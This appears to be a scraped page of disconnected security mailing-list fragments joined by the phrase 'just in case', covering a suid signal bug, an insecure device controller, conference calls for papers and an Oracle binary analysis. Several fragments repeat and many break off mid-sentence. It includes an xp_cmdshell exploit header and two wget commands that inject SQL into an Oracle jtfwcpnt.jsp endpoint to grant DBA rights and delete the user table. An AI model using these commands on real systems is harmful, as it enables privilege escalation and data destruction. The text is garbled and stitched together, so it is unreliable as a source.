| New User, Welcome! Login |
Just in case
> Yes, and I said this is a bug, but it is in general not exploitable.
It's roughly as exploitable as any other bug which allows signals to
be sent to privileged processes, i.e. it's mostly a DoS issue.
> > Just in case it hasn't sunk in yet, the inability to trust signals is
> > a consequence of this bug. Ordinarily, it should be possible to rely
> > upon the fact that an asynchronous signal cannot be sent to a suid
> > process by an unprivileged user.
>
> I disagree with you in that. Any hard guarantee can be given only by God.
I logged out of the mobile interface on my AT&T cell phone. "Just in case"
What is also frightening / interesting is that facebook seems to link
the two sessions so that when I logged out of the phone based session to
m.facebook.com, I was also logged out of my web based session as well.
Even more interesting is that trying to login to facebook on two
separate browser sessions won't work. I.e. if I login to facebook on one
computer, and then login again on another computer, or on the same
computer in a different browser (i.e. firefox for one session and i.e.
> >
> > A consequence of this bug is that no signal can be trusted.
>
> Sure.
Just in case it hasn't sunk in yet, the inability to trust signals is
a consequence of this bug. Ordinarily, it should be possible to rely
upon the fact that an asynchronous signal cannot be sent to a suid
process by an unprivileged user.
> > Also, if it's possible to set the signal to one which cannot be
It's not exactly hard, the web controller uses a nasty set of Java
applets to interact with itself. The shocking thing is that these
communicate using a series of xml packets and absolutely zero
authentication or encryption :-(
Oh, and just in case you thought about maybe putting something secure
like an ssl webserver proxying the thing, these java applets are hard
coded to connect back to port 80 on the originating host using HTTP :-(
Still, you should get an idea of how the box is *supposed* to be used by
the fact that its ip address is set with dip switches where the
The following code tries to execute calc.exe (if the xp_cmdshell stored procedure
is not enabled, it will try to reenable it via 'sp_configure', assuming you have
the privileges of the 'sa' user), otherwise use your imagination.
Note: Reportedly, this product is end of sale ... so it's better you are aware of
it just in case you have an online installation exposed to user input :)
rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
conference, although we strictly do not accept commercial/
product-related pitches. Keep in mind though, this is a one-day
conference, we receive a lot of submissions, so please do your best in
sending new / coolest research.
Just in case you need some ideas, some of the topics in security that
could be interesting to us:
* Mobile Devices
* Social Netwoking Threats
* Embedded Systems
> OS to guarantee certain behaviours. The problem here is that there is
> a mechanism which causes a guarantee to be violated.
>
Yes, and I said this is a bug, but it is in general not exploitable.
> Just in case it hasn't sunk in yet, the inability to trust signals is
> a consequence of this bug. Ordinarily, it should be possible to rely
> upon the fact that an asynchronous signal cannot be sent to a suid
> process by an unprivileged user.
>
I disagree with you in that. Any hard guarantee can be given only by God.
$ wget -O - “$TARGET/OA.jsp” "$TARGET/jtfwcpnt.jsp?query=begin%20execute
%20immediate%20'grant%20dba%20to%20mom';%20end;”
$ wget -O - “$TARGET/OA.jsp” "$TARGET/jtfwcpnt.jsp?query=begin%20execute
%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;”
Just in case you don't want to view the slides online or you hate (or
fear) Flash as I do, you can download the slides from my website [3] in
ODP format.
[1] Online slides: http://bit.ly/c80WeS
[2] RootedCon conference: http://www.rootedcon.es/
OK, uses shared libs, right:
-rwsr-s--x 1 oracle dba 145M Aug 31 16:42 oracle
An almost 150 Megabyte sized executable program, using shared libraries. Actually it has 17 shared library dependencies. The other shared libraries provided by Oracle, which are actually linked dynamically by other executables shipped with Oracle 11g, were statically linked into the oracle executable at compile time. We are talking libraries of 30 Megabytes and more linked in as well as sitting next to the binary, just in case.
The first approach of the analysis was to narrow down the relevant cryptographic algorithm and its implementation. Therefore, different techniques were used to find relevant methods and instructions within the executable. Most cryptographic algorithms like ciphers and checksum calculations expose some kind of "signature" or individual tokens like S-Boxes, transformation tables or constant values. Thus it might be easy to detect automatically within the binary, using tools like the FindCrypt IDA plugin or other scripts we developed for our own purposes.
At least 57 places with crypto were found by FindCrypt: DES, MD4, MD5, SHA1, just to name a few. We found at least two independently implemented AES cipher constants, all algorithms were double and triple implemented.
It's not exactly hard, the web controller uses a nasty set of Java
applets to interact with itself. The shocking thing is that these
communicate using a series of xml packets and absolutely zero
authentication or encryption :-(
Oh, and just in case you thought about maybe putting something secure
like an ssl webserver proxying the thing, these java applets are hard
coded to connect back to port 80 on the originating host using HTTP :-(
Still, you should get an idea of how the box is *supposed* to be used by
the fact that its ip address is set with dip switches where the
It's not exactly hard, the web controller uses a nasty set of Java
applets to interact with itself. The shocking thing is that these
communicate using a series of xml packets and absolutely zero
authentication or encryption :-(
Oh, and just in case you thought about maybe putting something secure
like an ssl webserver proxying the thing, these java applets are hard
coded to connect back to port 80 on the originating host using HTTP :-(
Still, you should get an idea of how the box is *supposed* to be used by
Anything Information Security related is interesting for the
conference, although we do not accept commercial/ product-related
talks.
Just in case you need some ideas, some of the stuff that would be
interesting to us are:
* Operating Systems
* Career and Management topics
* Mobile Devices/Embedded Systems
|
|
|
